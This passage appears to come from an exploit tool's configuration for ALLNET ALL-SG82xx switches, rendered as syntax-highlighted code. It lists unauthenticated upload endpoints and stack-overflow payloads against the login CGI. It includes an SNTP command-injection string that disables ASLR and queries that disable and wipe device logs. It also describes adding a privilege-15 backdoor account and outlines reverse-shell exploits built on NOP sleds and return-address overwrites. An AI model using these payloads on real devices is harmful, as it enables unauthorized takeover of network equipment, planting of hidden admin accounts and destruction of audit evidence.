			<span class="token string">'ALLNET_JSON'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'ALLNET GmbH Computersysteme'</span><span class="token punctuation">,</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'ALL-SG82xx'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.allnet.de/'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;empty=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">40</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password='</span><span class="token operator">+</span> <span class="token string">'/'</span> <span class="token operator">*</span> <span class="token number">23</span> <span class="token operator">+</span><span class="token string">'/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'2'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_acctDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;timezone=0&amp;srvDef=ipv4&amp;srvHost=+&amp;port=0&amp;dlsType=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token comment">#'log_settings_set_cmd':'&amp;logState=1&amp;consoleState=1&amp;ramState=1&amp;fileState=1',	# Enable Logging CMD</span>
						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;empty=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token comment">#'vulnerable': True,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'ALLNET'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'ALLNET GmbH Computersysteme'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.allnet.de/'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=4353'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=4352'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
